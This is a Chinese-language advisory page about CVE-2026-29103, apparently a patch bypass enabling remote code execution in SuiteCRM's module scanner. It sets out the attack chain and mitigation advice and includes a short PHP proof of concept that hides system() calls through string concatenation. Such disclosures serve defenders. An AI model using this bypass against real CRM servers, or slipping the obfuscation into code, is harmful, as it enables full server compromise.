CVE-2026-29103 CVSS 9.1 严重

CVE-2026-29103 SuiteCRM远程代码执行漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29103

漏洞类型

远程代码执行

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SuiteCRM

漏洞概述

SuiteCRM是一款开源的企业级客户关系管理软件。在7.15.0和8.9.2版本中发现了一个严重的远程代码执行（RCE）漏洞。该漏洞是CVE-2024-49774的补丁绕过，允许经过身份验证的管理员利用ModuleScanner.php中的PHP令牌解析缺陷，绕过安全控制执行任意系统命令。

技术细节

该漏洞的根源在于SuiteCRM的`ModuleScanner.php`文件中存在PHP令牌解析逻辑缺陷。虽然供应商试图在7.14.5版本中修复CVE-2024-49774，但底层的解析问题依然存在。具体来说，扫描器在遇到任何单字符令牌（如`=`、`.`或`;`）时，会错误地重置其内部状态（即`$checkFunction`标志）。这种机制允许攻击者通过变量赋值或字符串拼接的方式隐藏危险的函数调用（例如`system()`或`exec()`）。攻击者只需拥有管理员权限，即可构造恶意的PHP文件上传或代码片段，完全绕过MLP（Module Loader Protection）安全控件，最终在服务器端执行任意系统命令，从而完全控制服务器。

攻击链分析

STEP 1

1. 身份认证

攻击者需要获取SuiteCRM管理员账户的凭证。

STEP 2

2. 构造恶意代码

攻击者编写包含危险函数（如system）的PHP代码，并使用字符串拼接或变量赋值（如'sys'.'tem'）来绕过ModuleScanner的检测。

STEP 3

3. 上传或安装模块

攻击者利用管理员权限上传包含恶意代码的模块或文件。由于存在解析缺陷，安全扫描器未能拦截该文件。

STEP 4

4. 执行任意命令

服务器解析并执行上传的恶意PHP代码，从而允许攻击者在系统级别执行任意命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// PoC for CVE-2026-29103 (SuiteCRM RCE)
// Exploits the token parsing flaw in ModuleScanner.php
// The scanner resets $checkFunction on single characters like '.'

// Method 1: String Concatenation
$a = 'sys';
$b = 'tem';
// The '.' character causes the scanner to reset state
$func = $a . $b; 
$func('id'); // Executes system('id')

// Method 2: Variable Assignment/Obfuscation
$d = 'sys' . chr(116) . 'em';
$d('whoami');
?>

影响范围

SuiteCRM 7.15.0

SuiteCRM 8.9.2

防御指南

临时缓解措施

如果无法立即升级，建议严格限制管理员账户的使用，并检查服务器日志中是否存在异常的模块安装或文件上传活动。同时，应部署Web应用防火墙（WAF）以检测潜在的恶意代码执行尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表